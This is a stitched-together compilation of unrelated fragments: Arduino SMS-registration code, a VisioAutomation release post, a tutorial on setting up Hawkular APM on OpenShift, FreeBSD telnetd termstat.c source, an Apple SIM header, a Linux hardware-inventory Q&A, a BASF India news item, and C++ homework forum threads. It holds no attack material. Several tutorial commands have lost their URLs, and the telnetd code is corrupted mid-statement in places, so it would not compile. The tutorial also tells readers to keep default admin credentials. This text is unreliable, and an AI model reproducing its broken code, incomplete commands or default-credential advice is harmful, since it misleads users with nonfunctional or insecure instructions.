gsm.readSMS(smsdata, 160, num_rcv, NUM_MAX);
eeprom_write_block(num_rcv, num_save, NUM_MAX); // write_block takes src (RAM) first, dst (EEPROM) second
eeprom_read_block(num_rcv, num_save, NUM_MAX); // read_block takes dst (RAM) first, src (EEPROM) second
#include <SIM900.h>
#include <sms.h>
#include <avr/eeprom.h>

SMSGSM sms;

#define NUM_MAX 20
char reg_num[NUM_MAX];              // registered number read back from EEPROM
char save[NUM_MAX] EEMEM;           // EEPROM slot for the registered number
const char passRx[] = "Regpass#";   // password for registering
char storage[160];                  // received message storage
char smsdata[160];                  // received message
char numberRx[NUM_MAX];             // number received (RAM buffer; EEMEM was misplaced here)

void checkSMS() {
    if (gsm.readSMS(smsdata, 160, numberRx, 20)) { // read the sms
        eeprom_read_block(reg_num, save, NUM_MAX); // read the stored number first,
                                                   // so it can be compared below
        if (strncmp(smsdata, passRx, 8) == 0) {    // if the password is correct
            sms.SendSMS(numberRx, "Registered");   // send reply
            eeprom_write_block(numberRx, save, NUM_MAX); // save it to EEPROM (src, dst)
        }
        else if (strncmp(numberRx, reg_num, 20) == 0) { // if it is the registered number
            if (strlen(smsdata) < 151) {           // check if longer than 150 chars
                sms.SendSMS(numberRx, "Message received"); // send reply
                strcpy(storage, smsdata);          // store the message
            } else {                               // if longer
                sms.SendSMS(numberRx, "Max char reached"); // send reply
            }
        }
    }
}
The latest version of my VisioAutomation library has been published on codeplex:
Because there are so many components, I’ve drawn this conceptual map to help you see which pieces are useful for you.
QUICK SUMMARY
- VisioAutomation is the name of the CodePlex project, a Visual Studio .SLN, a specific CSPROJ file, a specific DLL, and a namespace.
- VisioAutomation.DLL contains the “core” (lowest-level) features
- VisioAutomation.Extensions – a series of extension methods, meant for the convenience of those doing low-level work with the Visio Automation API
- VisioAutomation.Util – Utility classes to simplify common scenarios such as working with Custom properties or Text formatting
- many helper classes – looking at the unit tests, the user applications, and the higher-level APIs is a good way to see how these work
- VisioAutomation.DOM
- Its primary purpose is really to enable you to build up a DOM (a model of a diagram) and then render it all at once. One way to think about this is that it automates a lot of the techniques for drawing a diagram fast (for example, the use of the SetFormulas() and DropMany() methods)
- VisioAutomation.Scripting
- This is a high-level interface for people writing interactive applications. The scripting API is session-oriented, i.e. it assumes you have an instance of the Visio application you are working against, and that operations are typically performed against the currently selected set of shapes.
- VisioAutomation.Metadata
- This is a new DLL whose only purpose is to provide a "database" of information about Visio concepts, such as mapping ShapeSheet cell names to section indices, row indices, and cell indices. In the future I'll use this for code generation. (Actually, it was used to generate a bunch of classes in the "core" API.)
- VisioAutomation.VDX
- This is an experimental attempt at a library that creates VDX files programmatically. It enables scenarios where you generate Visio content without having Visio around. In practice, this is useful for relatively simple documents.
- VisioIPy and VisioPS
- These are command line tools for interactively playing with a Visio application via IronPython 2.6.1 and Powershell 2.0. They both completely rely on the VisioAutomation.Scripting layer
- Here’s a screencast demonstrating VisioPS:
- Visio Power Tools
- If you aren’t interested in code or scripting – this is the tool for you. A small collection of little utilities in the form of a Visio Add-in.
- Like VisioIPy and VisioPS it uses the VisioAutomation.scripting interface
- It works with Visio 2007 and Visio 2010
- Notable changes since the last version
- The Export to XAML feature is still available, but no longer on the File Menu, instead find it under the Power Tools/ Import & Export menu
- Added support for exporting SVG embedded in XTHML
- VisioAutomation Samples
- This is a demonstration app that serves several purposes: #1 it's a showcase for some of the features, #2 it provides a way of validating that changes in the core libraries haven't broken real-world scenarios, #3 it demonstrates how to use the core libraries and VisioIPy
- Isotope
- Everything that isn’t directly related to Visio gets put into this utility library. The “Isotope” name is just a placeholder and doesn’t have any special meaning.
DOCUMENTATION [updated 2010-04-15]
I have started (*started*) documenting the project here:
WHAT NEXT
- Changes in the v 2.5 branch will be minimal, bugfix level stuff. My only planned work is to add a “Visio Power Tools 2010” project to make use of the Visio 2010 ribbon interface.
- I’ll be creating a v 3.0 branch. This will be focused on moving to .NET 4.0. It will be experimental for quite some time.
- Now that the core library is done, I need to update all my previous Visio blog posts to use the correct APIs; I anticipate this will take a month or so.
Have no doubt, OpenShift is a great platform for running microservices-architectured applications! However, when it comes to Application Performance Management (APM) some may think there’s an issue because no components are off-the-shelf in the platform. Indeed this makes sense because APM is a tricky problem and may be addressed in many ways depending on application technology – and after all, microservices architecture is also about picking the right technology for the right problem! ;-) However, this article introduces a quite non-intrusive solution for Spring Boot (and more generally servlet-based) microservices by using Hawkular APM.
Hawkular APM?
OpenShift provides a built-in monitoring tool called Hawkular. That tool is in charge of collecting metrics from Docker containers through the Kubernetes interface and storing, aggregating, and visualizing them. The metrics collected are CPU, Memory, Disk, and Network usage. Hawkular offers a “black-box” view of container performance but does not deal with application metrics like service performance or distribution of response time through application layers. For this specific case, the Hawkular community is working on another module called Hawkular APM that provides insight into the way an application executes across multiple (micro) services in a distributed (e.g. cloud) environment. Hawkular APM supports agent-based instrumentation for Java or API based metrics collection for other languages. It also supports distributed tracing frameworks like ZipKin or OpenTracing. It is not provided as a built-in module in OpenShift but it’s really easy to set up on OpenShift and have a Java application being monitored without touching the source code.
OpenShift part setup
First of all, we assume you already have an OpenShift cluster running (through a complete installation, a local
oc cluster up, the Red Hat Container Development Kit or something like Minishift). The first step is to install the Hawkular APM server that will be responsible for storing, aggregating and visualizing the application metrics.
The following commands can be issued in any OpenShift project/namespace of your choice.
# oc create -f
secret "hawkular-apm-admin-account" created
route "hawkular-apm" created
deploymentconfig "hawkular-apm" created
deploymentconfig "hawkular-apm-es" created
serviceaccount "hawkular-apm" created
serviceaccount "hawkular-apm-es" created
service "hawkular-apm" created
service "hawkular-apm-es" created
#
It’s just as easy as this! The OpenShift template for Hawkular APM creates deployments for the server and Elasticsearch backend, services, and a route for accessing the server. Just use the created route within a browser and access the UI after having authenticated with default
admin/password created. Here is the result on the screenshot below:
Container part setup
The next part of the process is to prepare a base Docker image for OpenShift that will be used for containerizing our Spring Boot applications from source. In OpenShift, this process of directly using sources and handling the Dockerization is called Source-to-image. For our Spring Boot / APM purpose, we will start from a base image handling basic Java Dockerization.
The goal of the customization is just to retrieve the Hawkular APM Java agent and to make it available as a lib within the base image that will later contain our Spring Boot fat jar application. A little trick here is to temporarily switch to the
root user to chmod the jar file correctly. Otherwise, the JVM, which will execute as another user, will not be able to read the Java agent jar during boot. Here's the Dockerfile:
FROM docker.io/fabric8/s2i-java:1.3.6

ENV APM_VERSION=0.13.0.Final
ENV APM_AGENT=/libs/hawkular-apm-agent.jar

ADD $APM_AGENT

# Temporary switch to root
USER root
RUN chmod 444 /libs/hawkular-apm-agent.jar

# S2I requires a numeric, non-0 UID. This is the UID for the jboss user in the base image
USER 185
Now that you’ve got this file, you can produce your own base Docker image and store it into a Docker registry for a later use from OpenShift. You can use for example the Docker Hub registry.
# docker build -t lbroudoux/s2i-java-apm .
# ...
# docker push lbroudoux/s2i-java-apm
# ...
Finally, in order to use this newly-built image on OpenShift conveniently, we may want to create some ImageStreams and Templates. We're not going into details on how to create those files; the ones I used for testing and demonstrating are available in my GitHub sample repository in the
/openshift directory.
Just use these 2 files to declare resources in your OpenShift installation like this:
# oc create -f -n openshift
imagestream "spring-boot-apm" created
# oc create -f -n openshift
template "spring-boot-apm" created
Bring it all together!
It’s now time to create a Spring Boot application to check everything is ok. For that, go to the project/namespace of your choice and use the
spring-boot-apm template that is now available. The default for this template uses the sample Spring Boot microservice from my GitHub repository. You don't have to change anything to get something running. After you press the Create button, the build starts (checking out sources, invoking the Maven build, and so on) and deployment should finish in a few minutes.
At that point, the application is up and you should have a microservice running at the exposed route; check your exact route configuration through the OpenShift console. However, if you check the Hawkular APM console again, you'll not notice anything new... That's because application performance management has not been turned on yet; it is disabled by default. In order to turn it on, go to your application deployment configuration and add the environment variables as below:
In order to get APM up, you have to add these 4 variables:
– HAWKULAR_APM_URI: the HTTP URI for accessing your Hawkular server (make sure not to use the HTTPS URL; I did not manage to get it working for now),
– HAWKULAR_APM_USERNAME: the username for connecting to the APM server; use the default
admin user,
– HAWKULAR_APM_PASSWORD: the password for connecting to the APM server; use the default admin password,
– JAVA_OPTIONS: the JVM options for enabling the Java agent; use
-javaagent:/libs/hawkular-apm-agent.jar=boot:/libs/hawkular-apm-agent.jar, which refers to the Hawkular agent previously added to the image libs.
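Alternatively, a minimal sketch of setting the same variables from the CLI instead of the web console (the deployment config name and Hawkular URL are placeholders for your own values):

oc set env dc/spring-boot-apm \
    HAWKULAR_APM_URI=http://hawkular-apm.example.com \
    HAWKULAR_APM_USERNAME=admin \
    HAWKULAR_APM_PASSWORD=password \
    JAVA_OPTIONS='-javaagent:/libs/hawkular-apm-agent.jar=boot:/libs/hawkular-apm-agent.jar'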
Once you've hit the Save button, the deployment is updated, a new container is deployed, and the Spring Boot application is now instrumented by the Hawkular Java agent. Make a few calls to the previous "Hello World" microservice and go check the results in Hawkular APM... Ta-da!
As a result, you now have these nice performance metrics and charts available for all the services in your app. Most noteworthy, this was done without a code change, and it can be enabled or disabled simply through environment variables.
#ifndef lint
static const char sccsid[] = "@(#)termstat.c	8.2 (Berkeley) 5/30/95";
#endif

#include <sys/cdefs.h>
__FBSDID("$FreeBSD: src/contrib/telnet/telnetd/termstat.c,v 1.13 2004/07/28 05:37:18 kan Exp $");

#include "telnetd.h"

#ifdef ENCRYPTION
#include <libtelnet/encrypt.h>
#endif

/*
 * local variables
 */
int def_tspeed = -1, def_rspeed = -1;
#ifdef TIOCSWINSZ
int def_row = 0, def_col = 0;
#endif
#ifdef LINEMODE
static int _terminit = 0;
#endif /* LINEMODE */

#ifdef LINEMODE
/*
 * localstat
 *
 * This function handles all management of linemode.
 *
 * Linemode allows the client to do the local editing of data
 * and send only complete lines to the server. Linemode state is
 * based on the state of the pty driver. If the pty is set for
 * external processing, then we can use linemode. Further, if we
 * can use real linemode, then we can look at the edit control bits
 * in the pty to determine what editing the client should do.
 *
 * Linemode support uses the following state flags to keep track of
 * current and desired linemode state.
 *	alwayslinemode : true if -l was specified on the telnetd
 *	command line. It means to have linemode on as much as
 *	possible.
 *
 *	lmodetype: signifies whether the client can
 *	handle real linemode, or if use of kludgeomatic linemode
 *	is preferred. It will be set to one of the following:
 *		REAL_LINEMODE : use linemode option
 *		NO_KLUDGE : don't initiate kludge linemode.
 *		KLUDGE_LINEMODE : use kludge linemode
 *		NO_LINEMODE : client is ignorant of linemode
 *
 *	linemode, uselinemode : linemode is true if linemode
 *	is currently on, uselinemode is the state that we wish
 *	to be in. If another function wishes to turn linemode
 *	on or off, it sets or clears uselinemode.
 *
 *	editmode, useeditmode : like linemode/uselinemode, but
 *	these contain the edit mode states (edit and trapsig).
 *
 * The state variables correspond to some of the state information
 * in the pty.
 *	linemode:
 *		In real linemode, this corresponds to whether the pty
 *		expects external processing of incoming data.
 *		In kludge linemode, this more closely corresponds to the
 *		whether normal processing is on or not. (ICANON in
 *		system V, or COOKED mode in BSD.)
 *		If the -l option was specified (alwayslinemode), then
 *		an attempt is made to force external processing on at
 *		all times.
 *
 * The following heuristics are applied to determine linemode
 * handling within the server.
 *	1) Early on in starting up the server, an attempt is made
 *	   to negotiate the linemode option. If this succeeds
 *	   then lmodetype is set to REAL_LINEMODE and all linemode
 *	   processing occurs in the context of the linemode option.
 *	2) If the attempt to negotiate the linemode option failed,
 *	   and the "-k" (don't initiate kludge linemode) isn't set,
 *	   then we try to use kludge linemode. We test for this
 *	   capability by sending "do Timing Mark". If a positive
 *	   response comes back, then we assume that the client
 *	   understands kludge linemode (ech!) and the
 *	   lmodetype flag is set to KLUDGE_LINEMODE.
 *	3) Otherwise, linemode is not supported at all and
 *	   lmodetype remains set to NO_LINEMODE (which happens
 *	   to be 0 for convenience).
 *	4) At any time a command arrives that implies a higher
 *	   state of linemode support in the client, we move to that
 *	   linemode support.
 *
 * A short explanation of kludge linemode is in order here.
 *	1) The heuristic to determine support for kludge linemode
 *	   is to send a do timing mark. We assume that a client
 *	   that supports timing marks also supports kludge linemode.
 *	   A risky proposition at best.
 *	2) Further negotiation of linemode is done by changing the
 *	   the server's state regarding SGA. If server will SGA,
 *	   then linemode is off, if server won't SGA, then linemode
 *	   is on.
 */
void
localstat(void)
{
	int need_will_echo = 0;

	/*
	 * Check for changes to flow control if client supports it.
	 */
	flowstat();

	/*
	 * Check linemode on/off state
	 */
	uselinemode = tty_linemode();

	/*
	 * If alwayslinemode is on, and pty is changing to turn it off, then
	 * force linemode back on.
	 */
	if (alwayslinemode && linemode && !uselinemode) {
		uselinemode = 1;
		tty_setlinemode(uselinemode);
	}

	if (uselinemode) {
		/*
		 * Check for state of BINARY options.
		 *
		 * We only need to do the binary dance if we are actually going
		 * to use linemode. As this confuses some telnet clients
		 * that don't support linemode, and doesn't gain us
		 * anything, we don't do it unless we're doing linemode.
		 * -Crh (henrich@msu.edu)
		 */
		if (tty_isbinaryin()) {
			if (his_want_state_is_wont(TELOPT_BINARY))
				send_do(TELOPT_BINARY, 1);
		} else {
			if (his_want_state_is_will(TELOPT_BINARY))
				send_dont(TELOPT_BINARY, 1);
		}

		if (tty_isbinaryout()) {
			if (my_want_state_is_wont(TELOPT_BINARY))
				send_will(TELOPT_BINARY, 1);
		} else {
			if (my_want_state_is_will(TELOPT_BINARY))
				send_wont(TELOPT_BINARY, 1);
		}
	}

#ifdef ENCRYPTION
	/*
	 * If the terminal is not echoing, but editing is enabled,
	 * something like password input is going to happen, so
	 * if we the other side is not currently sending encrypted
	 * data, ask the other side to start encrypting.
	 */
	if (his_state_is_will(TELOPT_ENCRYPT)) {
		static int enc_passwd = 0;
		if (uselinemode && !tty_isecho() && tty_isediting()
		    && (enc_passwd == 0) && !decrypt_input) {
			encrypt_send_request_start();
			enc_passwd = 1;
		} else if (enc_passwd) {
			encrypt_send_request_end();
			enc_passwd = 0;
		}
	}
#endif /* ENCRYPTION */

	/*
	 * Do echo mode handling as soon as we know what the
	 * linemode is going to be.
	 * If the pty has echo turned off, then tell the client that
	 * the server will echo. If echo is on, then the server
	 * will echo if in character mode, but in linemode the
	 * client should do local echoing. The state machine will
	 * not send anything if it is unnecessary, so don't worry
	 * about that here.
	 *
	 * If we need to send the WILL ECHO (because echo is off),
	 * then delay that until after we have changed the MODE.
	 * This way, when the user is turning off both editing
	 * and echo, the client will get editing turned off first.
	 * This keeps the client from going into encryption mode
	 * and then right back out if it is doing auto-encryption
	 * when passwords are being typed.
	 */
	if (uselinemode) {
		if (tty_isecho())
			send_wont(TELOPT_ECHO, 1);
		else
			need_will_echo = 1;
#ifdef KLUDGELINEMODE
		if (lmodetype == KLUDGE_OK)
			lmodetype = KLUDGE_LINEMODE;
#endif
	}

	/*
	 * If linemode is being turned off, send appropriate
	 * command and then we're all done.
	 */
	if (!uselinemode && linemode) {
# ifdef KLUDGELINEMODE
		if (lmodetype == REAL_LINEMODE) {
# endif /* KLUDGELINEMODE */
			send_dont(TELOPT_LINEMODE, 1);
# ifdef KLUDGELINEMODE
		} else if (lmodetype == KLUDGE_LINEMODE)
			send_will(TELOPT_SGA, 1);
# endif /* KLUDGELINEMODE */
		send_will(TELOPT_ECHO, 1);
		linemode = uselinemode;
		goto done;
	}

# ifdef KLUDGELINEMODE
	/*
	 * If using real linemode check edit modes for possible later use.
	 * If we are in kludge linemode, do the SGA negotiation.
*/ if (lmodetype == REAL_LINEM; # ifdef KLUDGELINEMODE } else if (lmodetype == KLUDGE_LINEMODE) { if (tty_isediting() && uselinemode) send_wont(TELOPT_SGA, 1); else send_will(TELOPT_SGA, 1); } # endif /* KLUDGELINEMODE */ /* * Negotiate linemode on if pty state has changed to turn it on. * Send appropriate command and send along edit mode, then all done. */ if (uselinemode && !linemode) { # ifdef KLUDGELINEMODE if (lmodetype == KLUDGE_LINEMODE) { send_wont(TELOPT_SGA, 1); } else if (lmodetype == REAL_LINEMODE) { # endif /* KLUDGELINEMODE */ send_do(TELOPT_LINEMODE, 1); /* send along edit modes */ output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode, IAC, SE); editmode = useeditmode; # ifdef KLUDGELINEMODE } # endif /* KLUDGELINEMODE */ linemode = uselinemode; goto done; } # ifdef KLUDGELINEMODE /* * None of what follows is of any value if not using * real linemode. */ if (lmodetype < REAL_LINEMODE) goto done; # endif /* KLUDGELINEMODE */ if (linemode && his_state_is_will(TELOPT_LINEMODE)) { /* * If edit mode changed, send edit mode. */ if (useeditmode != editmode) { /* * Send along appropriate edit mode mask. */ output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode, IAC, SE); editmode = useeditmode; } /* * Check for changes to special characters in use. */ start_slc(0); check_slc(); (void) end_slc(0); } done: if (need_will_echo) send_will(TELOPT_ECHO, 1); /* * Some things should be deferred until after the pty state has * been set by the local process. Do those things that have been * deferred now. This only happens once. */ if (_terminit == 0) { _terminit = 1; defer_terminit(); } netflush(); set_termbuf(); return; } /* end of localstat */ #endif /* LINEMODE */ /* * flowstat * * Check for changes to flow control */ void flowstat(void) { if (his_state_is_will(TELOPT_LFLOW)) { if (tty_flowmode() != flowmode) { flowmode = tty_flowmode(); output_data("%c%c%c%c%c%c", IAC, SB, TELOPT_LFLOW, flowmode ? LFLOW_ON : LFLOW_OFF, IAC, SE); } if (tty_restartany() != restartany) { restartany = tty_restartany(); output_data("%c%c%c%c%c%c", IAC, SB, TELOPT_LFLOW, restartany ? LFLOW_RESTART_ANY : LFLOW_RESTART_XON, IAC, SE); } } } /* * clientstat * * Process linemode related requests from the client. * Client can request a change to only one of linemode, editmode or slc's * at a time, and if using kludge linemode, then only linemode may be * affected. */ void clientstat(int code, int parm1, int parm2) { /* * Get a copy of terminal characteristics. */ init_termbuf(); /* * Process request from client. code tells what it is. */ switch (code) { #ifdef LINEMODE case TELOPT_LINEMODE: /* * Don't do anything unless client is asking us to change * modes. */ uselinemode = (parm1 == WILL); if (uselinemode != linemode) { # ifdef KLUDGELINEMODE /* * If using kludge linemode, make sure that * we can do what the client asks. * We can not turn off linemode if alwayslinemode * and the ICANON bit is set. */ if (lmodetype == KLUDGE_LINEMODE) { if (alwayslinemode && tty_isediting()) { uselinemode = 1; } } /* * Quit now if we can't do it. */ if (uselinemode == linemode) return; /* * If using real linemode and linemode is being * turned on, send along the edit mode mask. 
*/ if (lmodetype == REAL_LINEMODE && uselinemode) # else /* KLUDGELINEMODE */ if (uselinem; output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode, IAC, SE); editmode = useeditmode; } tty_setlinemode(uselinemode); linemode = uselinemode; if (!linemode) send_will(TELOPT_ECHO, 1); } break; case LM_MODE: { int ack, changed; /* * Client has sent along a mode mask. If it agrees with * what we are currently doing, ignore it; if not, it could * be viewed as a request to change. Note that the server * will change to the modes in an ack if it is different from * what we currently have, but we will not ack the ack. */ useeditmode &= MODE_MASK; ack = (useeditmode & MODE_ACK); useeditmode &= ~MODE_ACK; if ((changed = (useeditmode ^ editmode))) { /* * This check is for a timing problem. If the * state of the tty has changed (due to the user * application) we need to process that info * before we write in the state contained in the * ack!!! This gets out the new MODE request, * and when the ack to that command comes back * we'll set it and be in the right mode. */ if (ack) localstat(); if (changed & MODE_EDIT) tty_setedit(useeditmode & MODE_EDIT); if (changed & MODE_TRAPSIG) tty_setsig(useeditmode & MODE_TRAPSIG); if (changed & MODE_SOFT_TAB) tty_setsofttab(useeditmode & MODE_SOFT_TAB); if (changed & MODE_LIT_ECHO) tty_setlitecho(useeditmode & MODE_LIT_ECHO); set_termbuf(); if (!ack) { output_data("%c%c%c%c%c%c%c", IAC, SB, TELOPT_LINEMODE, LM_MODE, useeditmode|MODE_ACK, IAC, SE); } editmode = useeditmode; } break; } /* end of case LM_MODE */ #endif /* LINEMODE */ case TELOPT_NAWS: #ifdef TIOCSWINSZ { struct winsize ws; def_col = parm1; def_row = parm2; #ifdef LINEMODE /* * Defer changing window size until after terminal is * initialized. */ if (terminit() == 0) return; #endif /* LINEMODE */ /* * Change window size as requested by client. */ ws.ws_col = parm1; ws.ws_row = parm2; (void) ioctl(spty, TIOCSWINSZ, (char *)&ws); } #endif /* TIOCSWINSZ */ break; case TELOPT_TSPEED: { def_tspeed = parm1; def_rspeed = parm2; #ifdef LINEMODE /* * Defer changing the terminal speed. */ if (terminit() == 0) return; #endif /* LINEMODE */ /* * Change terminal speed as requested by client. * We set the receive speed first, so that if we can't * store separate receive and transmit speeds, the transmit * speed will take precedence. */ tty_rspeed(parm2); tty_tspeed(parm1); set_termbuf(); break; } /* end of case TELOPT_TSPEED */ default: /* What? */ break; } /* end of switch */ netflush(); } /* end of clientstat */ #ifdef LINEMODE /* * defer_terminit * * Some things should not be done until after the login process has started * and all the pty modes are set to what they are supposed to be. This * function is called when the pty state has been processed for the first time. * It calls other functions that do things that were deferred in each module. */ void defer_terminit(void) { /* * local stuff that got deferred. */ if (def_tspeed != -1) { clientstat(TELOPT_TSPEED, def_tspeed, def_rspeed); def_tspeed = def_rspeed = 0; } #ifdef TIOCSWINSZ if (def_col || def_row) { struct winsize ws; memset((char *)&ws, 0, sizeof(ws)); ws.ws_col = def_col; ws.ws_row = def_row; (void) ioctl(spty, TIOCSWINSZ, (char *)&ws); } #endif /* * The only other module that currently defers anything. */ deferslc(); } /* end of defer_terminit */ /* * terminit * * Returns true if the pty state has been processed yet. */ int terminit(void) { return(_terminit); } /* end of terminit */ #endif /* LINEMODE */
#ifndef _EAP8021X_SIMACCESS_H
#define _EAP8021X_SIMACCESS_H

/*
 * Modification History
 *
 * January 15, 2009    Dieter Siegmund (dieter@apple.com)
 * - created
 */

/*
 * SIMAccess.h
 * - API's to access the SIM
 */

#include <stdint.h>
#include <stdbool.h>

#define SIM_KC_SIZE     8
#define SIM_SRES_SIZE   4
#define SIM_RAND_SIZE   16

/*
 * Function: SIMProcessRAND
 * Purpose:
 *   Communicate with SIM to retrieve the (SRES, Kc) pairs for the given
 *   set of RANDs.
 * Parameters:
 *   rand_p   input buffer containing RANDs;
 *            size must be at least 'count' * SIM_RAND_SIZE
 *   count    the number of values in rand_p, kc_p, and sres_p
 *   kc_p     output buffer to return Kc values;
 *            size must be at least 'count' * SIM_KC_SIZE
 *   sres_p   output buffer to return SRES values;
 *            size must be at least 'count' * SIM_SRES_SIZE
 * Returns:
 *   TRUE if RANDS were processed and kc_p and sres_p were filled in,
 *   FALSE on failure.
 */
bool SIMProcessRAND(const uint8_t * rand_p, int count,
                    uint8_t * kc_p, uint8_t * sres_p);

#endif /* _EAP8021X_SIMACCESS_H */
I need to inventory the hardware on some Linux clients I recently "inherited". In the past, on Windows, I've used the excellent CPU-z to generate the hardware inventory. Is there a Linux equivalent of CPU-z?
You can use CPU-G; see the example here.
CPU-G is an application that shows useful information about your hardware. It collects and displays information about your CPU, RAM, Motherboard, some general information about your system and more
% dmidecode
% cat /proc/cpuinfo
% lspci -vvv
Run as root, these will all show you info about both CPU and memory. You might want to run update-pciids prior to some of those commands to download the newest version of the PCI ID list, to ensure everything reports your hardware correctly.
Other answers about /proc/cpuinfo, lspci, dmidecode and other tools are helpful. I would try to get away with them first if I could.
But for big jobs, HAL is the major mechanism to enumerate and identify hardware on Linux. Strictly speaking, HAL is an API accessible over the system DBus, but there are command-line tools to make HAL information available for human or script consumption.
To start out, try this:
$ lshal
The UDI is a namespace within HAL for all devices in your system. Everything else is key/value pairs where the keys are in a hierarchy defined in the HAL specification
I'm not familiar with CPU-z, but if you are interested in CPU information, search or grep for info.category = 'processor' which will give you a list of processors on the system, the manufacturer, whether they can throttle, etc. In general, info.category is the basic grouping of devices (battery, AC adapter, disk, etc.)
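For example, to pull out just the processor entries (a minimal sketch; the grep context sizes are arbitrary, and hal-find-by-property ships with most HAL packages):

# Show the HAL entries whose category is 'processor':
$ lshal | grep -B2 -A8 "info.category = 'processor'"

# Or ask HAL directly for the matching device UDIs:
$ hal-find-by-property --key info.category --string processor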
% cat /proc/cpuinfo
% dmidecode
x86info can decode CPU features and display them in human readable form.
You can list all hardware using
lshw
or
lspci
21 January 2005 03:59 [Source: ICIS news]
This increase was helped by a jump in total income for the three months to Rs1.901bn from the Rs1.589bn, the company said in a statement to the Bombay Stock Exchange after a board meeting on Thursday.
On Thursday, the board approved a proposal to incorporate a wholly-owned subsidiary, BASF Polyurethanes, to manufacture and market its polyurethane (PU) products. This company would have a paid-up capital of not more than Rs100m.
The company said that a subsidiary would allow it to give more focus to the PU business, which currently accounts for only 2% of the company’s sales.
BASF India has three divisions, with the plastics and fibres division producing PU, expanded polystyrene (EPS) and engineering plastics. The performance products division produces synthetic leather and textile chemicals, while the agricultural and nutrition division produces pesticides and fine chemicals.
The company is a publicly traded subsidiary of German chemicals major BASF, which has a 50% share in it.
Hello,
I'm new to this forum and I really need help with this newbie problem. I've been struggling with this assignment for a very long time now. I'm not even sure how to start the code, or how to structure it. My code is a complete mess, and I'm not sure what I'm doing here. Any help is appreciated. Here's what's being asked of me:
In a loop your program should do the following (you can use a do/while):
receive as data input the weights (proportions) for the four exam grades, and put these into an array called weights.
Read in 4 test grades into another array called grades.
Use the following test data for one example:
weights for exams: .10, .20, .25, .45
first student record: 75, 87, 79, 92
make up the rest yourself.
call the function isitvalid() passing in the grades array, the function returns a bool (i.e. a boolean value).
The function isitvalid() will determine whether or not the values in this array are valid. It will return true/1 for valid and false/0 if it's invalid. The function will return invalid if any grade in the array is not a valid grade (i.e. it's greater than 100 or less than 0). If the function returns false, your main program should read 4 values into the grades array again.
You should calculate and print the final grade, which is the weighted average.
Next your program will allow the user to see the any number of their test scores. For example. Your program can display a message such as: "If you don't believe the score is correct, how many of your grades would you like to see?", and it should call a function printarray() which takes two parameters, the array, and the number of grades the user would like to see..
The function printarray() does not return anything, it will print out the number of grades the user would like to see. For example if the user passed the number 2, it will print the first two grades from the grades array.
Your program will ask the user if s/he would like to enter another student.
At the end of your program, you should print the class average i.e. the average of all the final grades combined.
Here's what i got so far:
Yes, evidently I'm very confused. Please help!

Code:

#include <iostream>
#include <fstream>
#include <math.h>
using namespace std;

bool isitvalid(double grades[]);
void printarray();

int main(){
    double weights[4], grades[4];
    do {
        for (int i = 0; i < 4; i++){
            cout << "weight " << i << " :";
            cin >> weights[i];
        }
        for (int k = 0; k < 4; k++){
            cout << "grade: " << k ;
            cin >> grades[k];
        }
    } while (cin);
}

bool isitvalid(double grades[]){
    int k;
    bool cond = 0;
    if (grades[k] >= 0 && grades[k] <= 100){
        cond = 1;
    }else{
        cond = 0;
        return cond;
    }
}
}
void printarray()
cin >> k
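For reference, here is a minimal working sketch of what the assignment describes (function names follow the prompt; the exact prompts and input handling are illustrative):

#include <iostream>
using namespace std;

// Returns true only if every one of the 4 grades is between 0 and 100.
bool isitvalid(const double grades[]) {
    for (int i = 0; i < 4; i++)
        if (grades[i] < 0 || grades[i] > 100)
            return false;
    return true;
}

// Prints the first 'count' grades from the array.
void printarray(const double grades[], int count) {
    for (int i = 0; i < count && i < 4; i++)
        cout << "Grade " << i + 1 << ": " << grades[i] << endl;
}

int main() {
    double weights[4], grades[4];
    double classTotal = 0;
    int students = 0;
    char again;

    do {
        for (int i = 0; i < 4; i++) {       // exam weights, e.g. .10 .20 .25 .45
            cout << "Weight " << i + 1 << ": ";
            cin >> weights[i];
        }
        do {                                // re-read until all grades are valid
            for (int i = 0; i < 4; i++) {
                cout << "Grade " << i + 1 << ": ";
                cin >> grades[i];
            }
        } while (!isitvalid(grades));

        double final_grade = 0;             // weighted average
        for (int i = 0; i < 4; i++)
            final_grade += weights[i] * grades[i];
        cout << "Final (weighted) grade: " << final_grade << endl;

        int howMany;
        cout << "If you don't believe the score is correct, "
                "how many of your grades would you like to see? ";
        cin >> howMany;
        printarray(grades, howMany);

        classTotal += final_grade;
        students++;

        cout << "Enter another student (y/n)? ";
        cin >> again;
    } while (again == 'y');

    cout << "Class average: " << classTotal / students << endl;
    return 0;
}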
I was asked to write a program to assign seats on a plane. There are ten seats on a plane and I must use an array to fill up each seat. The input is "1 for smoking" and "2 for non-smoking." How am I supposed to assign the seats on the plane? Here is what I got:
#include <iostream.h>
#include <cmath>
int main()
{
int i, plane, seat[10];
cout<<"This program will assign you seats in the airplane."<<endl;
do
{
cout<<"Please type 1 for ''smoking''"<<endl;
cout<<"Please type 2 for ''non-smoking''"<<endl;
cin>>seat[i];
for (i=0;i<10;i++)
if (seat[i]==1)
cin>>seat[i];
else if (seat[i]==2)
{
cin>>seat[i];
cout<<"Your seat assignment is "<<seat[5]<<" (non-smoking section)"<<endl;
}
else
cout<<"Next flight leaves in 3 hours"<<endl;
}while(i<10);
return 0;
}
//now i am getting an error after this so i'm really not sure what to do. Please HELP!
#2 - Re: Assigning and declaring arrays and elements. Posted 23 November 2005 - 04:38 AM
cout<<"Please type 1 for ''smoking''"<<endl;
this line will generate an error as you cannot have "'s in a string like that; you have to use the '\"' character to denote a double quote inside of a string
cout<<"Please type 1 for \''smoking\''"<<endl;
as for filling the seats...do you have to fill each seat, one at a time, or keep requesting "smoking" or "non-smoking" from the user until all the seats are filled up. is part of the array supposed to be designated for smoking and the other part to be non-smoking only?
#3 - Re: Assigning and declaring arrays and elements. Posted 23 November 2005 - 11:40 AM
Yes, I'm supposed to keep asking the user to input smoking or non-smoking until all seats are full. I was thinking of using a do-while loop to keep asking the same question. But what I don't understand is how I can keep looping that question and fill up each array element with a passenger.
#4 - Re: Assigning and declaring arrays and elements. Posted 23 November 2005 - 11:44 AM
and also, yes, only arrays [0]-[4] are non-smoking and arrays [5]-[9] should be for smoking. Once all of smoking or non-smoking is filled up, it should output something like, "The smoking section is full, would you like to sit in the smoking section(y or n). And for this I would use an "if" statement I believe. And if they choose "n" it will output "next flight leaves in 3 hours."
#5 - Re: Assigning and declaring arrays and elements. Posted 23 November 2005 - 02:10 PM
